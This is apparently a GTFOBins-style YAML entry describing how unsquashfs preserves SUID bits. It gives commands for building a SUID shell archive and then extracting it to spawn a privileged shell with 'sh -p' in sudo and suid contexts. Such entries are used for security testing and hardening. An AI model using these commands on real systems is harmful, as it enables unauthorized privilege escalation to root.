Files

19 lines
371 B
Plaintext

---
comment: |-
`unsquashfs` preserve the SUID bit when extracting the file system. For example, prepare an archive beforehand with the following commands as root:
```
cp /bin/sh .
chmod +s sh
mksquashfs sh shell
```
functions:
privilege-escalation:
- code: |-
unsquashfs shell
./squashfs-root/sh -p
contexts:
sudo:
suid:
...